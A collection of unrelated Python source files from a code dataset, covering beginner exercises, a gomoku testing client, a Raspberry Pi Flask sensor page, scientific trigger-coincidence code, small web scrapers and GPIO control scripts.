+{"seq_id":"121594843","text":"from typing import Dict, List, Optional, TypedDict, TYPE_CHECKING\n\nfrom pydiet import persistence, completion, flags, nutrients, quantity, ingredients, tags, time, steps\n\nif TYPE_CHECKING:\n from pydiet.persistence.supports_persistence import DBInfo, PersistenceInfo\n\n\nclass RecipeData(TypedDict):\n name: Optional[str]\n ingredient_composition: Dict[str, 'IngredientCompositionData']\n serve_intervals: List[str]\n steps: Dict[int, str]\n tags: List[str]\n\n\ndef get_empty_recipe_data() -> RecipeData:\n return RecipeData(\n name=None,\n ingredient_composition={},\n serve_intervals=[],\n steps={},\n tags=[]\n )\n\n\ndef get_new_recipe() -> 'Recipe':\n return Recipe(get_empty_recipe_data())\n\n\nclass Recipe(persistence.supports_persistence.SupportsPersistence,\n completion.supports_completion.SupportsCompletion,\n flags.supports_flags.SupportsFlags,\n nutrients.supports_nutrient_content.SupportsNutrientContent,\n quantity.supports_bulk.SupportsBulk,\n ingredients.supports_ingredient_composition.SupportsSettingIngredientComposition,\n tags.supports_tags.SupportsSettingTags,\n time.supports_serve_times.SupportsSettingServeTimes,\n steps.supports_steps.SupportsSettingSteps):\n\n def __init__(self, data: 'RecipeData', datafile_name: Optional[str] = None):\n self._data = data\n self._datafile_name = datafile_name\n self._name: Optional[str] = None\n\n @property\n def _flags_data(self) -> Dict[str, Optional[bool]]:\n flags_data = flags.supports_flags.get_empty_flags_data()\n for flag_name in flags_data:\n flags_data[flag_name] = True\n for ic in self._ingredient_composition:\n if ic.ingredient.get_flag_value(flag_name) is False:\n flags_data[flag_name] = False\n continue\n elif ic.ingredient.get_flag_value(flag_name) is None:\n flags_data[flag_name] = None\n return flags_data\n\n @property\n def _ingredient_composition(self) -> Dict[str, 'IngredientPercentageData']:\n ...\n\n @property\n def _nutrients_data(self) -> Dict[str, 'NutrientData']:\n ...\n\n @property\n def missing_mandatory_attrs(self) -> List[str]:\n attr_names = []\n if not self.name_is_defined:\n attr_names.append('name')\n if len(self.ingredients) == 0:\n attr_names.append('ingredients')\n if len(self.tags) == 0:\n attr_names.append('tags')\n if len(self.serve_times) == 0:\n attr_names.append('serve_times')\n return attr_names\n\n @property\n def name(self) -> Optional[str]:\n return self._name\n\n @property\n def name_is_defined(self) -> bool:\n return self.name is None\n\n @property\n def _persistence_info(self) -> 'PersistenceInfo':\n return persistence.supports_persistence.PersistenceInfo(\n data=self._data,\n datafile_name=self._datafile_name\n )\n\n @staticmethod\n def get_db_info() -> 'DBInfo':\n return persistence.supports_persistence.DBInfo(\n unique_field_name='name',\n path_into_db=persistence.configs.recipe_db_path\n )\n\n def set_datafile_name(self, datafile_name: str) -> None:\n self._datafile_name = datafile_name\n\n def set_name(self, value: str) -> None:\n self.set_unique_field(value)\n","sub_path":"pydiet/recipes/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643266139","text":"# rotate an array in place\ndef rotate(a, n):\n \n old_a = a.copy() # O(n) memory tho\n for i in range(len(a)):\n a[i] = old_a[(i + n) % len(a)]\n \n return a\n\n\n# rotate an array in place using const memory\n# issue is that you're modifying the array as you use it\ndef rotate2(a, n):\n \n old_a = a.copy()\n for i in range(len(a)):\n a[i] = old_a[(i + n) % len(a)]\n \n return a\n\n\n# print('a = {}, a[{}] = {}, a[{}] = {}'.format(old_a, i, old_a[i], (i + n) % len(a), old_a[(i + n) % len(a)]))\n# print(rotate(list(range(4)), 2))\n# print(rotate(list(range(5)), 2))\n# print(rotate(list(range(6)), 2))\n# print(rotate(list(range(7)), 2))\n\n# note: trick is to do three reverse operations\n# reverse can be done using swaps\n# one reverse for whole array, two for each partition of the rotation\n\n# reversing array in place\ndef reverse(a):\n i, j = 0, len(a) - 1\n while i < j:\n a[i], a[j] = a[j], a[i]\n i += 1\n j -= 1\n return a\n\n# what if we use a generator for yielding proper values of old array? \n# a is an object that consists of a pointer and size\n# this probably uses O(n) memory, not O(1) mem\ndef create_gen(a, k):\n for i in range(len(a)):\n yield a[(i + k) % len(a)]\n\ndef rotate3(a, k):\n\n g = create_gen(a.copy(), k)\n\n for i in range(len(a)):\n a[i] = next(g)\n\n return a\n\n# print(reverse(list(range(5))))\nprint(rotate3(list(range(5)), 2))\n","sub_path":"rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"448468090","text":"# -*- coding:utf-8 -*-\n\n#定义类\nclass Cat:\t#class关键字定义类,类名首字母大写\n\t#属性\n\t#方法, def在类里面使用就是定义方法,要在第一个参数的位置加上self\n\tdef eat(self):\n\t\tprint(\"猫在吃鱼...\")\n\n\n#创建对象\ncat = Cat() #类创建的对象是引用类型,类名+()表示新建对象,然后cat指向这个对象\ncat.eat()\n#print(help(Cat))\n#print(help(cat.eat))\n\n\n\n\n","sub_path":"面向对象/01定义类创建对象.py","file_name":"01定义类创建对象.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"395751703","text":"#!/usr/bin/env python\nimport logging\nimport sys\nimport unittest\nimport scipy as sp\nimport numpy as np\nimport mango.mpi as mpi\nimport mango.image\nimport mango.io\n\nlogger, rootLogger = mpi.getLoggers(__name__)\n\nclass DiscreteGaussianDownsampleTest(unittest.TestCase):\n def setUp(self):\n subdShape = sp.array((32,128,64))\n mpiCartShape = mango.mpi.getCartShape(dimension=3)\n mpiCartShape = sp.array(mpiCartShape)\n\n self.imgShape = mpiCartShape*subdShape\n\n def doTestDiscreteGaussianDownsampleWithHalo(self, haloSz=0):\n if (isinstance(haloSz, int) or ((sys.version_info.major < 3) and isinstance(haloSz, long))):\n if (haloSz < 0):\n haloSz = 0\n haloSz = sp.array((haloSz,)*3)\n \n imgDds = mango.zeros(shape=self.imgShape, mtype=\"tomo_float\", halo=haloSz)\n imgDds.md.setVoxelSize((1,1,1));\n imgDds.md.setVoxelSizeUnit(\"mm\");\n \n logger.info(\"imgDds.mtype=%s\" % imgDds.mtype)\n logger.info(\"imgDds.md.getVoxelSize()=%s\" % imgDds.md.getVoxelSize())\n rspDds = \\\n mango.image.gaussian_downsample(\n imgDds,\n interptype=mango.image.InterpolationType.LINEAR,\n voxsz=4.0*sp.array(imgDds.md.getVoxelSize())\n )\n logger.info(\"imgDds.shape=%s\" % imgDds.shape)\n logger.info(\"rspDds.shape=%s\" % rspDds.shape)\n\n slc = []\n for d in range(len(haloSz)):\n slc.append(slice(haloSz[d], rspDds.asarray().shape[d]-haloSz[d]))\n \n slc = tuple(slc)\n \n self.assertTrue(sp.all(imgDds.dtype == rspDds.dtype))\n self.assertTrue(sp.all(imgDds.mtype == rspDds.mtype), \"%s != %s\" % (imgDds.mtype, rspDds.mtype))\n self.assertTrue(sp.all(imgDds.halo == rspDds.halo))\n self.assertTrue(sp.all(((imgDds.shape)//4) == rspDds.shape))\n self.assertTrue(sp.all(imgDds.origin//4 == rspDds.origin), \"%s != %s\" % (imgDds.origin, rspDds.origin))\n self.assertTrue(sp.all(imgDds.mpi.shape == rspDds.mpi.shape))\n self.assertTrue(sp.all(imgDds.md.getVoxelSize()*4 == rspDds.md.getVoxelSize()))\n\n logger.info(\"imgDds min = %s, imgDds max = %s\" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))\n logger.info(\"rspDds min = %s, rspDds max = %s\" % (np.min(rspDds.asarray()[slc]), np.max(rspDds.asarray()[slc])))\n logger.info(\"num non-zero rspDds = %s\" % sp.sum(sp.where(rspDds.asarray()[slc] != 0, 1, 0)))\n \n self.assertTrue(sp.all(imgDds.asarray() == 0))\n self.assertTrue(sp.all(rspDds.asarray()[slc] == 0))\n\n imgDds = mango.zeros(shape=self.imgShape, mtype=\"tomo\", halo=haloSz, origin=(2,-8,4))\n imgDds.md.setVoxelSize((1,1,1));\n imgDds.md.setVoxelSizeUnit(\"mm\");\n\n rspDds = \\\n mango.image.gaussian_downsample(\n imgDds,\n interptype=mango.image.InterpolationType.CATMULL_ROM_CUBIC_SPLINE,\n factor=(0.5,0.5,0.5)\n )\n slc = []\n for d in range(len(haloSz)):\n slc.append(slice(haloSz[d], rspDds.asarray().shape[d]-haloSz[d]))\n \n slc = tuple(slc)\n\n self.assertTrue(sp.all(imgDds.dtype == rspDds.dtype))\n self.assertTrue(sp.all(imgDds.mtype == rspDds.mtype))\n self.assertTrue(sp.all(imgDds.halo == rspDds.halo))\n self.assertTrue(sp.all(imgDds.shape//2 == rspDds.shape))\n self.assertTrue(sp.all(imgDds.origin//2 == rspDds.origin), \"%s != %s\" % (imgDds.origin//2, rspDds.origin))\n self.assertTrue(sp.all(imgDds.mpi.shape == rspDds.mpi.shape))\n self.assertTrue(sp.all(imgDds.md.getVoxelSize() == rspDds.md.getVoxelSize()/2))\n\n logger.info(\"imgDds min = %s, imgDds max = %s\" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))\n logger.info(\"rspDds min = %s, rspDds max = %s\" % (np.min(rspDds.asarray()[slc]), np.max(rspDds.asarray()[slc])))\n logger.info(\"num non-zero rspDds = %s\" % sp.sum(sp.where(rspDds.asarray()[slc] != 0, 1, 0)))\n \n self.assertTrue(sp.all(imgDds.asarray() == 0))\n self.assertTrue(sp.all(rspDds.asarray()[slc] == 0))\n\n def testDiscreteGaussianDownsampleWithHalo0(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(0)\n\n def testDiscreteGaussianDownsampleWithHalo1(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(2)\n\n def testDiscreteGaussianDownsampleWithHalo2(self):\n self.doTestDiscreteGaussianDownsampleWithHalo(4)\n\nif __name__ == \"__main__\":\n mango.setLoggingVerbosityLevel(\"high\")\n mpi.initialiseLoggers(\n [__name__, \"mango.mpi\", \"mango.image\", \"mango.imageTest\"],\n logLevel=logging.INFO\n )\n unittest.main()\n","sub_path":"misc/python/mango/imageTest/_DiscreteGaussianDownsampleTest.py","file_name":"_DiscreteGaussianDownsampleTest.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"377132798","text":"#creds to Balaji as well for making the continous analysis function!\n\nimport socket, threading, json, contextlib, io, time\nfrom random import *\n\ngomoku = __import__(\"gomoku\") #put your filename here (pls for the love of god run this shit in the same folder as your file (and for the love of jesus do not pyzo this))\n\nHEADER = 16\nDELAY = 0.5 #hehehehe\nPORT = 5555\nFORMAT = 'utf-8'\nHOST_IP = '172.105.7.203' #hey those trying to hack my server! there ain't shit on there so gl + my gomoku server is run within a try statement so good f****** luck trying to break that shit\n\nclass Network:\n\n def __init__(self):\n self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.host = HOST_IP \n self.addr = (self.host, PORT)\n self.id = self.connect()\n\n def connect(self):\n self.client.connect(self.addr)\n self.client.send(str.encode('controller'))\n received_message = self.client.recv(2048).decode(FORMAT)\n print(received_message)\n\n def send(self, data):\n \"\"\"\n :param data: str\n :return: str\n \"\"\"\n try:\n self.client.send(str.encode(\"a:\" + str(data)))\n print(\"DONE\")\n except socket.error as e:\n return str(e)\n\n def get_analysis(self, board):\n self.client.send(str.encode('A:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\n def get_win(self, board):\n self.client.send(str.encode('W:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\n def get_search(self, board):\n self.client.send(str.encode('S:' + json.dumps(board)))\n return self.client.recv(2048).decode(FORMAT)\n\nclass client():\n\n def __init__(self):\n self.network = Network()\n\n def run(self):\n not_ended = True\n print(\"Hello! Welcome to mrmandarin's Gomoku testing program!\")\n while(not_ended):\n print(\"Here are your options:\")\n print(\"1 - Analyse Once\")\n print(\"2 - Continuously Analyse\")\n print(\"3 - Check Win Once\")\n print(\"4 - Continuously Check Win\")\n print(\"5 - Continously Check Search_Max\")\n print(\"6 - Exit\")\n s = input()\n if(s == '6'):\n not_ended = False\n elif(s == '1'):\n self.analyze()\n elif(s == '2'):\n self.continuous_analysis()\n elif(s == '3'):\n self.compare_win()\n elif(s == '4'):\n self.continuous_win()\n elif(s == '5'):\n self.continuous_search_max()\n else:\n print(\"Dafuq you entered boii\")\n\n def analyze(self):\n print(\"ANALYSING!\")\n print(\"GENERATED BOARD:\")\n board = self.generate_random_board()\n gomoku.print_board(board)\n print(\"HERE'S YOUR ANALYSIS:\")\n gomoku.analysis(board)\n print(\"-------------------------------\")\n analysis = json.loads(self.network.get_analysis(board))\n print(\"HERE'S MRMANDARINS ANALYSIS:\")\n for a in analysis:\n print(a)\n print('\\n')\n\n def continuous_win(self):\n board = self.generate_random_board()\n correct_cnt = 0\n\n while(gomoku.is_win(board) == self.network.get_win(board) or self.network.get_win(board) == \"Impossible\"):\n print(gomoku.is_win(board))\n print(self.network.get_win(board))\n correct_cnt += 1\n print(f\"Number of correct matches: {correct_cnt}\")\n time.sleep(DELAY)\n board = self.generate_random_board()\n\n print(\"\\n\\nSomething Doesn't Match!\")\n print(\"Here's the board:\")\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS: \")\n print(gomoku.is_win(board))\n print('-------------------------------')\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_win(board))\n print('\\n')\n\n def continuous_search_max(self):\n print(\"USE AT YOUR OWN RISK CUZ SCORE DO BE WHACK\")\n board = self.generate_random_board()\n correct_cnt = 0\n\n while(str(gomoku.search_max(board)) == self.network.get_search(board)):\n print(str(gomoku.search_max(board)))\n print(self.network.get_search(board))\n correct_cnt += 1\n print(f\"Number of correct matches: {correct_cnt}\")\n time.sleep(DELAY)\n board = self.generate_random_board()\n\n print(\"WE HAVE FOUND AN ERROR ^_^\")\n print(\"Here's the board:\")\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS: \")\n print(str(gomoku.search_max(board)))\n print('-------------------------------')\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_search(board))\n print('\\n')\n\n def compare_win(self):\n print(\"Impossible refers to when both white and black have winning sequences, this will not be tested.\")\n print(\"GENERATED BOARD:\")\n board = self.generate_random_board()\n gomoku.print_board(board)\n print(\"YOUR PROGRAM CLAIMS:\")\n print(gomoku.is_win(board))\n print(\"-------------------------------\")\n print(\"MRMANDARINS'S PROGRAM CLAIMS:\")\n print(self.network.get_win(board))\n \n def continuous_analysis(self): #thanks Balaji!\n yourAnalysis = []\n serverAnalysis = []\n board = None\n correct_counter = 0\n print(\"To go back to menu just restart the program\")\n while yourAnalysis == serverAnalysis:\n correct_counter += 1\n board = self.generate_random_board()\n\n f = io.StringIO()\n with contextlib.redirect_stdout(f): # temporarily redirect console output to a string buffer \n gomoku.analysis(board)\n yourAnalysis = f.getvalue().split(\"\\n\")[0:-1] # readlines() didn't work\n \n serverAnalysis = json.loads(self.network.get_analysis(board)) \n \n time.sleep(DELAY) # no DDos :)\n print(\"Correct:\", correct_counter) # my highscore is 17023\n\n print(\"\\nFound a case that doesn't work!\")\n print(\"\\nThis is the list version of the board (for copy-paste):\\n\", board)\n print(\"\\nBoard:\")\n gomoku.print_board(board)\n print(\"\\nHere is the difference between the analyses:\\n\")\n\n # if analyses aren't the same length, then you messed up gomoku.analysis()\n for i in range(len(serverAnalysis)): \n \n # which stone colour?\n if yourAnalysis[i].find(\"stones\") >= 0:\n print(yourAnalysis[i])\n # either print only the lines that are wrong:\n if yourAnalysis[i] != serverAnalysis[i]:\n print(\" Your:\", yourAnalysis[i])\n print(\"Server:\", serverAnalysis[i])\n print(\"\")\n\n #this returns a randomized board, you can also make this return your own custom board to test it against my program\n def generate_random_board(self):\n board = []\n for i in range(8):\n board.append([\" \"]*8)\n for i in range(randint(5, 30)):\n #this below is absolutely disgusting code but just let it be, man's on a time crunch\n yeee = ('w', 'b')\n try:\n gomoku.put_seq_on_board(board, randint(0, 7), randint(0, 7), randint(-1, 1), randint(0, 1), randint(2, 5), yeee[randint(0,1)])\n except:\n i -= 1\n return board\n '''\n str_board = json.dumps(board)\n return json.loads(str_board)\n '''\n\nroot = client()\nroot.run()\n","sub_path":"gomoku/gomoku_tester.py","file_name":"gomoku_tester.py","file_ext":"py","file_size_in_byte":7688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"45902538","text":"\"\"\" Reading a file into Python\"\"\"\n\njabber = open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r')\n\n#Printing the entire file:\nfor line in jabber:\n print(line)\n\n# Searching and printing via keywords:\nfor line in jabber:\n if \"jabberwock\" in line.lower():\n print(line, end='')\n\njabber.close()\n\n# Using \"with\" for better object manangement. With performs close()\n#automatically:\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n for line in jabber:\n if \"JAB \" in line.upper():\n print(line, end='')\n\n# Setting a variable to readline()\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n line = jabber.readline()\n while line:\n print(line, end='')\n # resetting line to readline() continues the line by line processeing\n # of the file until no more lines can be read\n line = jabber.readline()\n\n# Using readlines() to read the entire file and return a list []\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.readlines()\nprint(lines)\n\n# Process the lines[] list:\nfor line in lines:\n print(line, end='')\n\n\n# Using a range with the lines[] list\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.readlines()\nprint(type(lines))\n\n# Process the lines[] list:\nfor line in lines[::-1]:\n print(line, end='')\n\nwith open(\"/Users/thewickk/python_masterclass/sample.txt\", 'r') as jabber:\n lines = jabber.read()\nprint(type(lines))\n\n# Summary:\n# read() reads an entire file in as one string\n# readline() reads a single line from a file and returns a sting\n# readlines() reads and entire file and returns a list[] of strings\n\n# readline() is the preferred method with large files, as it does not read\n# the entire file into memory\n\n\n\n\n\n","sub_path":"python_InputOutput/reading_from_file.py","file_name":"reading_from_file.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"649366863","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sqlite3 as lite\nimport sys\n\n#Author: Ekram\n#Using flask python web framework,javascript,html,css, some jquery,JSON and some ajax\n#Basic understanding on the above required to understand code. Recommend going this route pythob->html->css->jscript->jquery->flask->sql->JSON and ajax\n#Ajax is awesome in that it lets you load a specific variable from any function and edit it directly asyncronously into any webpage element, could not get\n#it to work properly yet so omitted as of now. Must look into it to stop WHOLE page from having to refresh every 1 second\n#After running this code the function index will host a webpage on the raspberry pi at http://localhost:5000, instead of localhost put pi IP address\n#The webpage hosted is configured to refresh automatically every 1 second. And so every 1 second the proximity function is called and checks the distance\n#The proximity distance is also sent to an sqlite database so that other concurrent programs can access it and work upon that argument \n\nfrom flask import Flask, render_template, request, url_for\nimport time\nimport RPi.GPIO as GPIO\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Define a route for the default URL, which loads the form\n@app.route('/')\ndef index():\n PDISTANCE = Proximity()\n \n #SQLITE SECTION. BASICALLY SENDING PROXIMITY READINGS INTO A TABLE DATABASE TO BE USED IN OTHER PROGRAMS AS MOTOR ARGUMENT#\n con = lite.connect('T7.db')\n name = \"Ekram\"\n\n with con:\n \n cur = con.cursor()\n cur.execute(\"DROP TABLE IF EXISTS MonitorValues\")\n cur.execute(\"CREATE TABLE MonitorValues(Proximity INT, Name TEXT)\")\n cur.execute(\"INSERT INTO MonitorValues (Proximity,Name) VALUES(?,?)\",(PDISTANCE,name))\n #SQLITE SECTION END-----------------------------------------------------------------------------------------------------#\n \n if (PDISTANCE>1):\n DBool = 1 #I will use this bit as the argument to load red led image or safe led image on the website\n else:\n DBool = 0\n Monitor_Variables = { # Storing variables as JSON to allow it to pass between javascript and python [note that str means string so all variables must be converted to string first] \n 'Distance': str(PDISTANCE),\n 'Bool' : str(DBool)\n } \n \n #---------------------THIS WHOLE THING WILL BE LOADED INTO THE BROWSER OF WHOEVER GOES TO THE address localhost:5000, can use templates instead which makes for nicer looking code---------#\n return '''\n\n \n \n Home Page \n \n \n Obstacle in front of you is appx ''' + Monitor_Variables['Distance'] + ''' cm away
\n \n
\n \n \n \n '''\n\n#---------------------Cannot comment on the above since whole thing is a string. Consult hand written notes to understand and remember what they do---------#\n#---------------------Key thing to note is Monitor_variables which through JSON allows jscript and python to intermingle------------------------------------#\n\n#The Ultra sound sensor function which will be called into the index function above every 1 second due to the webpage auto refreshing every 1 second\ndef Proximity():\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n TRIG = 23 #Proximity sensor pins\n ECHO = 24\n \n GPIO.setup(TRIG,GPIO.OUT)\n GPIO.setup(ECHO,GPIO.IN)\n \n GPIO.output(TRIG, False)\n \n GPIO.output(TRIG, True)\n \n time.sleep(0.00001)\n \n GPIO.output(TRIG, False)\n \n while GPIO.input(ECHO)==0:\n\n pulse_start = time.time()\n \n while GPIO.input(ECHO)==1:\n\n pulse_end = time.time()\n \n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration*1750\n distance = round(distance, 2)\n print (\"Distance:\",distance,\"cm\")\n return distance\n\n\n#This will effectively host the page \nif __name__ == '__main__':\n \n app.run(debug=True, host='0.0.0.0')\n","sub_path":"Proximity_Flask.py","file_name":"Proximity_Flask.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"216682221","text":"# Copyright (C) 2015 Alex Nitz\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\"\"\" This modules contains functions for calculating and manipulating\ncoincident triggers.\n\"\"\"\nimport numpy\n\ndef time_coincidence(t1, t2, window, slide_step=0):\n \"\"\" Find coincidences by time window\n \n Parameters\n ----------\n t1 : numpy.ndarray\n Array of trigger times from the first detector\n t2 : numpy.ndarray\n Array of trigger times from the second detector\n window : float\n The coincidence window in seconds\n slide_step : optional, {None, float}\n If calculating background coincidences, the interval between background\n slides in seconds.\n \n Returns\n -------\n idx1 : numpy.ndarray\n Array of indices into the t1 array.\n idx2 : numpy.ndarray \n Array of indices into the t2 array.\n slide : numpy.ndarray\n Array of slide ids \n \"\"\"\n if slide_step:\n fold1 = t1 % slide_step\n fold2 = t2 % slide_step\n else:\n fold1 = t1\n fold2 = t2\n \n sort1 = fold1.argsort()\n sort2 = fold2.argsort() \n fold1 = fold1[sort1]\n fold2 = fold2[sort2]\n \n if slide_step:\n fold2 = numpy.concatenate([fold2 - slide_step, fold2, fold2 + slide_step])\n sort2 = numpy.concatenate([sort2, sort2, sort2])\n\n left = numpy.searchsorted(fold2, fold1 - window)\n right = numpy.searchsorted(fold2, fold1 + window)\n\n idx1 = numpy.repeat(sort1, right-left)\n idx2 = numpy.concatenate([sort2[l:r] for l,r in zip(left, right)])\n \n if slide_step:\n diff = ((t1 / slide_step)[idx1] - (t2 / slide_step)[idx2])\n slide = numpy.rint(diff)\n else:\n slide = numpy.zeros(len(idx1))\n \n return idx1, idx2, slide\n\n\n","sub_path":"pycbc/events/coinc.py","file_name":"coinc.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"229521785","text":"from .agent import Agent\n\n\nfrom .configuratons import AGENT_CONFIGURATIION_BASE, WAIT_STATE\n\n\nclass AgentFactory:\n @staticmethod\n def create(init_state, configuration):\n agent = Agent()\n for state, action in configuration.items():\n agent.add_action(state, action)\n\n agent.set_state(init_state)\n\n return agent\n\n @classmethod\n def create_from_base_configuration(cls):\n agent = cls.create(\n init_state=WAIT_STATE, configuration=AGENT_CONFIGURATIION_BASE\n )\n\n return agent\n","sub_path":"model/agent/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"638192730","text":"import requests\nimport re\nfrom requests.exceptions import RequestException\nrequests.packages.urllib3.disable_warnings()\n\nurl = 'https://www.12306.cn/index/script/core/common/station_name_v10029.js'\n\ndef get_one_page(url, headers): #打开页面并抛出错误\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n response.encoding = 'utf-8'\n return response.text\n return None\n except RequestException:\n return None\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7'}\n\njs = get_one_page(url, headers)\nprint(js)\nstations = re.findall('([\\u4e00-\\u9fa5]+)\\|([A-Z]+)', js)\nprint(stations)\nfile = open(\"station_names.txt\", \"w+\", encoding='utf-8')\nfile.truncate()\nfor station in stations:\n file.write(station[0] + ',')\n file.write(station[1] + '\\n')\n\nfile.close()\n\n","sub_path":"crawlers/cityNameScawler.py","file_name":"cityNameScawler.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"392698858","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'eternal'\n\nfrom bs4 import BeautifulSoup\n\nfrom common.crawler import BaseCrawler\n\nclass NeteaseCrawler(BaseCrawler):\n \"\"\"\n 网易新闻\n \"\"\"\n def __init__(self):\n BaseCrawler.__init__(self)\n self.url = \"http://news.163.com\"\n\n def parse_html(self):\n html = self.request(self.url)\n soup = BeautifulSoup(html)\n news = soup.find_all(\"a\", class_=\"ac01\")\n for item in news:\n print(item.getText())\n print(item['href'])\n\n\n\n","sub_path":"news/netease.py","file_name":"netease.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"139666833","text":"from tkinter import *\nimport meteo\n\nmaster = Tk()\n\n# Text Input\ne = Entry(master)\ne.pack()\n\n# Label per la Temperatura\ntemp = Label(master, text='Temperatura:')\ntemp.pack()\n\n# Label per visualizzare la temperatura\ntempString = StringVar()\ntempLabel = Label(master, textvariable=tempString)\ntempLabel.pack()\n\n# Label per la Temperatura Minima\ntempmin = Label(master, text='Minima:')\ntempmin.pack()\n\n# Label per visualizzare la temperatura minima\ntempMinString = StringVar()\ntempMinLabel = Label(master, textvariable=tempMinString)\ntempMinLabel.pack()\n\n# Label per la Temperatura Massima\ntempmax = Label(master, text='Massima:')\ntempmax.pack()\n\n# Label per visualizzare la temperatura massima\ntempMaxString = StringVar()\ntempMaxLabel = Label(master, textvariable=tempMaxString)\ntempMaxLabel.pack()\n\n# Funzione per ottenere temperatura attuale, minima e massima convertite in celsius\ndef getMeteo():\n info = meteo.getMeteo(e.get())\n tempString.set(info['temp'])\n tempMaxString.set(info['temp_max'])\n tempMinString.set(info['temp_min'])\n\n# Bottone per richiamare la funzione getMeteo\nb = Button(master, text = \"cerca\", width = 10, command = getMeteo)\nb.pack()\n\nmainloop()","sub_path":"code/meteo/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"559992338","text":"import RPi.GPIO as GPIO\nimport time\n\nclass GPIODoor(object):\n \"\"\"Can be used to open a door at physical/Board pin 5.\n In the current revision (2) this is known as GPIO 01\"\"\"\n def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(18, GPIO.OUT)\n\n def openDoor(self, duration = 1):\n \"\"\"Sends the open door command to the transponder.\n @duration [Optional] the time the relay is switched to high\"\"\"\n GPIO.output(18, True)\n time.sleep(duration)\n GPIO.output(18, False)\n GPIO.cleanup()\n print('1')\n\nif __name__ == '__main__':\n door = GPIODoor()\n door.openDoor()","sub_path":"Sources/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"419829312","text":"# --------------------------------------------------------------------------\n# Introdução a Programação de Computadores - IPC\n# Universidade do Estado do Amazonas - UEA\n# Prof. Jucimar Jr\n# TIAGO FERREIRA ARANHA 1715310047\n#\n# 1. Faça um Programa que leia um vetor de 5 números inteiros e mostre-os.\n#---------------------------------------------------------------------------\n\nlista = []\nn = 0\n\nwhile n < 5:\n lista.append(int(input()))\n n+=1\n\nfor numero in lista:\n print(numero)","sub_path":"lista06/lista06_lista01_questao01.py","file_name":"lista06_lista01_questao01.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
